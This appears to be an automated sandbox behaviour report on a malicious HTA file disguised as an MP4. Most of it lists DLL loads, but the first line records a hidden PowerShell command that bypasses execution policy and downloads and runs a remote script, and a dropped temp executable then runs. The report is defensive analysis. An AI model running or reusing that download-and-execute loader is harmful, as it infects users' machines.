                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe "C:\Users\user~1\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: dwrite.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: msvcp140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: dwmapi.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: d3d9.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: d3d10warp.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeSection loaded: windowscodecs.dll
                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: web55.mp4.htaStatic file information: File size 1316307 > 1048576
